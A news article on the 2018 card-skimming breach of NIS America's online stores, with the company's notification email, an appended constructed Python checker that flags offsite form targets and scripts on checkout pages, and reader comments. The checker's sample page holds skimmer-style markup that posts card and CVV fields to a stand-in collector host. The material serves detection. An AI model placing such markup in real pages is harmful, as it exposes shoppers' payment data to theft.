Publisher NIS America is contacting customers to inform them that the company's online stores have been hacked and user information - including credit card details - has been stolen.
The attack occurred sometime between January 23rd and February 26th on the stores store.nisamerica.com and snkonlinestore.com. The data breach allowed the hacker access to customer information for all new credit card orders placed between those dates, including name, address, credit card number, expiration date and CVV security code, and email address. Those who used PayPal to pay for orders did not have their payment information or login details exposed during this hack.
NIS America is sending out codes which entitle affected users to claim $5 off their next purchase.
Here's the email that is being sent out to customers:
We are contacting you to notify you of a data breach which occurred between January 23rd, 2018 and February 26th, 2018 on online stores owned and operated by NIS America, Inc., including store.nisamerica.com and snkonlinestore.com. This data breach allowed an unauthorized party to access customer payment and address information for new credit card orders placed between these dates.
Our customers are our top priority, and it is our responsibility to provide a safe and secure environment for you to shop online with confidence. We would like to inform our customers of what happened as a result of this breach, the steps we have taken to resolve it, and what you can do to protect yourself.
Am I impacted by this?
Yes. Your personal information, including your payment information, may have been compromised. Personal information, including payment information, was taken directly from new orders placed using a credit card between January 23rd, 2018 and February 26th, 2018. Orders placed using PayPal during this time period did not have their payment information or PayPal login information skimmed by this process. Orders placed before this time period were not impacted. Based on our information, we have determined that your information may have been affected by this.
What happened?
On the morning of February 26th, we became aware of a malicious process that had attached itself to our checkout page. This process was being used as far back as January 23rd, 2018 to skim personal information provided by our customers during checkout after they placed an order at our store.
After entering their billing, shipping, and payment information, the customer would be temporarily redirected to an offsite web page not owned or operated by NIS America, Inc. This malicious process would record the information provided by the customer during the checkout process, including credit card information, billing address, shipping address, and email address. Afterward, the malicious process would return the customer to the NIS America store page to complete their transaction.
Transactions conducted in this manner were still successfully completed on the NIS America store pages. However, the payment information recorded by the malicious process could be used for fraudulent charges in the future. Fraudulent payments could be attempted at any storefront that accepts credit card payments, not just NIS America, Inc. store pages.
What information was involved?
The skimming process had access to all information provided by the customer during checkout, including their name, address, credit card number, expiration date and CVV security code, and email address.
We do not collect Social Security numbers, and there is no evidence that any payment or billing information provided prior to January 23rd, 2018 was compromised.
What actions were taken as a result of this issue?
Once we became aware of this issue, we immediately took our store pages offline to prevent any further breaches. After taking our store pages offline, we scanned all our processes to determine the exact point of entry, as well as determine when this change occurred on our online stores. We have taken steps to solve the issue that resulted in this breach, along with several other steps to improve our site’s security.
What you can do to protect yourself:
-Check your bank or credit card statement for suspicious activity, or charges that you do not recognize. If you see any fraudulent or suspicious charges, please contact your bank or credit card’s fraud department. It is possible for any information gathered by this malicious process to be saved and used at a later date, so regularly checking your statements for unusual activity is the best way to ensure your card is not being misused.
-Contact your bank or credit card company to cancel cards you feel may be impacted by this issue, and request a new card. If you request a new card, please remember to update any automatic payments that may attempt to draw from the old card. If replacing a card, you will need to update preorders for future products provided by NIS America, Inc.’s online stores. For secure payment, we can send invoices via email directly from PayPal, which can be paid with or without a PayPal account. PayPal information was not breached during this event.
-Check your credit report for any anomalies. The Federal Trade Commission recommends http://www.annualcreditreport.com/ . Additionally, you can place a free, 90-day fraud alert with one of the three major credit bureaus and/or place a credit freeze on your file to restrict access to your credit report by other parties. For more information, please visit https://www.identitytheft.gov/Steps
-If you have a user account on one of NIS America, Inc.’s online stores, please know that we do not store payment information within these accounts. User accounts are used primarily to track past orders and gain reward points. Data for past orders is stored securely, and will only show the last four digits of a credit card, and will not show the CVV security code or expiration date. It is still recommended to change the password of any accounts you have with a store operated by NIS America, Inc.
-If you encounter any warning messages from your web browser that you may be proceeding to an unsafe page on our site or any other site, stop what you are doing and contact the site’s operators.
-Keep an eye out for fraudulent emails, texts, phone calls, or fake websites trying to get your personal information. Never give out private or personal information, including financial details, unless you can verify the identity of the person or organization contacting you. Don’t respond to texts or emails coming from a contact you don't recognize, and don’t click on any links they provide. Instead, if you need to check your account, type the site address you want to visit into your browser and securely log into your account.
-NIS America will never ask you for your personal information, payment information, or password via email, unless contacted to do so by our customers via our customer support channels. Updated payment information is only collected through PayPal, using either an invoice or direct payment.
We know that this issue and the steps needed to resolve it can be frustrating. We share these feelings, and we pledge to do our best to get this issue resolved, and prevent it from happening again. At this time, we can say that we have identified the issue, removed it from our website, and taken steps to prevent this issue from recurring, as well as added new security to our online stores. We would not be reopening our online stores if we did not feel confident that they are a safe place to shop.
We are committed to earning back your trust and confidence, and we hope to have the opportunity to serve you again soon. We will be sending out codes for a $5.00 discount on your next purchase from our online store to those impacted by this issue within the next few days. We understand that this is a small token, but we hope it will show our commitment and appreciation of our customers as we begin to regain your trust.
If you have any questions or concerns, please feel free to contact us and we would be happy to assist you in any way that we can. We can be reached anytime at [email protected]
We are determined to provide you with a safe and secure shopping experience going forward. We hope to see you on our online stores again soon.
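The email above describes checkout data being sent to an offsite page before the shopper was returned to the store. As an added example (not code from NIS America or from this article; the host names, sample page and function names are constructed for illustration), a store operator could audit the served checkout HTML for any form target, script, frame or redirect that points outside an allowlist of its own hosts:

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Attributes that can send checkout data, or the shopper, to another origin.
WATCHED = {("form", "action"), ("script", "src"), ("iframe", "src"),
           ("button", "formaction"), ("input", "formaction")}

class CheckoutAudit(HTMLParser):
    """Collect every URL on a checkout page that can receive form data or run code."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.targets = []            # (tag, attribute, absolute URL)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name, value in attrs.items():
            if (tag, name) in WATCHED and value:
                self.targets.append((tag, name, urljoin(self.page_url, value)))
        # <meta http-equiv="refresh" content="0; url=..."> is a redirect too.
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            _, _, url = (attrs.get("content") or "").partition("=")
            if url.strip():
                self.targets.append((tag, "refresh", urljoin(self.page_url, url.strip(" '\""))))

def offsite_targets(html, page_url, allowed_hosts):
    """Return the targets whose host is not on the store's allowlist."""
    audit = CheckoutAudit(page_url)
    audit.feed(html)
    return [t for t in audit.targets if urlparse(t[2]).hostname not in allowed_hosts]

# Constructed sample page: two references leave the store's own hosts.
SAMPLE_PAGE = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/vendor.js"></script>
<script src="https://stats.collector.invalid/c.js"></script>
</head><body>
<form method="post" action="https://pay.collector.invalid/confirm">
  <input name="card_number"><input name="cvv">
  <button formaction="/checkout/submit">Pay</button>
</form>
</body></html>
"""
ALLOWED = {"shop.example", "cdn.shop.example"}  # assumed allowlist

if __name__ == "__main__":
    for tag, attr, url in offsite_targets(SAMPLE_PAGE, "https://shop.example/checkout", ALLOWED):
        print(f"offsite {tag}[{attr}] -> {url}")
```

This static check does not see elements injected at runtime or the contents of inline scripts; a Content-Security-Policy with `form-action` and `script-src` restrictions covers the browser side.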
Comments (51)
Does this include the Europe store?
"NIS America is sending out codes which entitle affected users to claim $5 off their next purchase." AHH HA HA HA HA HA. Nope. "Sorry that shopping with us is so unsecure and opens you up to fraud. Please buy more"
At the very least, they're not trying to hide it...
"We are committed to earning back your trust and confidence"
They think that costs $5. LMAO
@SLIGEACH_EIRE This will be for physical copies - not digital games. Those are sold via the eShop.
@Damo Oh, ya, duh! Silly me. Sorry. Thankfully I've never bought anything from their store as I find them expensive especially their Collector's Editions.
@GrailUK That is something they should at least say if it was or not.
Wow, a whole $5 code for the hassle of canceling your credit card.
Sigh... it's 2018. There is absolutely no valid reason for any online store to be personally handling or storing credit card information. None. And this is why they absolutely should not be.
Lol 5 bucks? Give me all the stuff for free.
@Damo Kirby star allies has demo in eu uk eshop
5 bucks is better than nothing. When this happened to Gamestop during the switch launch they didn't offer anything.
Who is NIS?
Is that $5 compensation an early April fools joke or what?
That isn't covering the slightest all the hassle one has to go through canceling their credit cards and issuing a new one and the email spam that one will have to endure the coming time.
Not to mention full name and address details compromised as well.
So what about identity theft protection for ones affected?
@riChchestM But but but you get 5 dollars off!
I wouldn't have bothered with the five dollars. That seems more of an insult than offering nothing.
This needs half price games or something similar.
This is why I use temporary disposable credit cards to shop online. It's a bit more hassle but when stuff like THIS happens I know I'm not in trouble.
$5... maybe for AngryJoe. In all seriousness though, they should've given games digitally to the ones that are affected that don't use PayPal. I'm just sitting here being dumbfounded that they wanted to earn back people's trust in the store site by giving a crappy compensation. Even if it's something rather than nothing, the amount of work for the consumer is already stressful as is and that $5 is more like an insult than anything.
Wow... I placed my Ys8 pre-order on Jan 18th so I guess I am fine.
I never order anything from them, I buy their games through retail or secondhand shop or the eShop.
NIS America can't seem to catch a break these days.
Although most of the issues are self-inflicted... (trying to cut corners on publishing, censorship in localization, questionable ordering protocols, etc.)
1) Please don't handle billing information yourself in this day and age
2) Please don't store CVV. Negative consequences FAR outweigh the (potential) benefits
@Raylax - And who exactly should be? A Bank? With multiple outlets of personal online stores? Ones that are oft attacked as well?
@Jeronan
It's not "compensation" it's a gesture of good will.
Most companies... they don't give you squat. So criticizing the ONLY company that's ever given me ANYTHING for compromised data... seems misguided. It may not be a lot (And it's not) but it lets me know they are sincere. Because that $5 adds up when you're dealing with 100k customers.
Fyi yes, this affects me and I got the email. I made 2 purchases between these dates.
Guess it's a good thing I didn't buy that wall scroll the other day.
Their public statement should have been
"Sorry dood!"
@JaxonH exactly 👍
5 bucks for my credit card information? That’s an insult. I hope they crash and burn
So our credit card info was worth $5? (I mean, that might be my current cash balance due to the Switch killing off the rest of my budget but) that's a huge slap in the face.
@JaxonH Bullocks!! Other companies were forced to give Identity protection, when credit card and personal info was stolen!
And those companies that tried to hide it, paid dearly later on with class action lawsuits and ended up spending even more with court costs, identity protection, etc!
5 bucks discount on a product in their store that was hacked is a complete insult! Are they trying to be funny?
That doesn’t cost them anything, since they're not giving you the 5 bucks. They just discount it on a product in their store.
@Jeronan
No. Letting the info get stolen in the first place was the insult.
Actually offering free money to 100k people regardless of whether they were for sure affected or not... That's commendable.
Did I get anything from Sony when they were hacked? Nope. Did I get anything from Gamestop? Nope. Have I ever gotten anything from anyone...
Nope.
They should have sent you nothing. Then you would actually be complaining LESS because it's just another instance of another company with a security breach.
@Yasaal
No. That's not what it's worth. Obviously.
They're not paying you for what they think it's worth. This is not compensation. This is a good will gesture. Probably set aside a million dollars and dispersed evenly to everyone (which is a small amount per person).
Your CC company, THEY are the ones that will pay you what it's "worth" thanks to their fraud protection. This is just a "We're sorry" And it's dang well more than anyone else has ever done.
@JaxonH ehh what??? Maybe you should get your facts straight. Sony ended up paying everyone that was affected!
They also had to pay a big fine for hiding it from their customers for so long that people got their identity stolen!
Sony had to pay up to 2500 dollars for each victim that got their identity stolen.
Credit card has fraud protection, but your personal information is not!
@Jeronan Link with proof. Provide it. You make the claim, you provide the evidence.
@Jeronan
I sure as heck got nothing. I can ASSURE you of that.
Five bucks?! They should be paying off my home loans! My life is ruined!
The reactions in here. NIS should have just kept the five bucks. People would be fussing anyway. At least it’d be more about the part that’s actually important.
@What_Sthat No one cares about 5 bucks credit in their store, where most wouldn’t want to buy stuff anymore anyway, when all their personal info, email and credit card info was stolen!
I sure wouldn’t do any business with them anymore, so that 5 bucks credit they could shove up their rear end.
What I would more care about if I were a victim is Identity protection!
@MegaVel91 Sony lost the Class Action lawsuit in the US. So everyone in the US that was affected could choose up to two free games, everyone else that settled before already got a free game.
I live in Europe and was not affected by the hack, but I did get compensated for that very long PSN outage. Everyone got compensation for that.
Everyone that had their info stolen due to the hack, was also offered a year free Identity theft protection.
I got that actually offered, since my info on SOE’s servers, which were part of the hack did get stolen there. Luckily my info there was outdated, so I didn’t care, but at least did get some compensation from SOE as well.
PS. There is even a whole wikia page with all information about it:
https://en.m.wikipedia.org/wiki/2011_PlayStation_Network_outage
Jeeeesus. Five dollars. IF you come back and buy more [STUFF] from us after we literally handed your credit card number to criminals.
I'm sympathetic to the challenges of conducting online business but HOW do you think that's a smart response?
Glad I've never bought from them, but dang...this crap is getting out of control.
Stuff like this is why I don't save credit card information on shopping sites that aren't Amazon.
@Raylax Correction, Credit card details are not stored on NISA site but as it's clearly stated that customers were redirected to a site that looks like NISA on site where the customers were unwittingly given out details to the hackers then led back to NISA's own site.
Long story short their credit card details were not stored on NISA's site.
@JayJ Yeah, it's always worth the (minor) hassle of entering your data each time so this kind of thing has a lower chance of occurring.
@TommyTLG Nippon Ichi Software [America].
I love Nippon Ichi Software but I have never bought anything directly from them. I wasn't even aware they had their own store.
That's sad dood.
Ordered SNK HEROINES Tag Team Frenzy Diamond Dream Edition from the SNK Online Store on January 13th, via Paypal. Made it by 10 days even.
That’s really a poor compensation, dood. They could’ve at least given out some sardines.
@JaxonH True. But I doubt the trouble we had was worth a mere $5... It felt like they were saying the error was worth $5... Gimme $60
@Raylax they aren’t storing it. This was a man in the middle hack according to the text.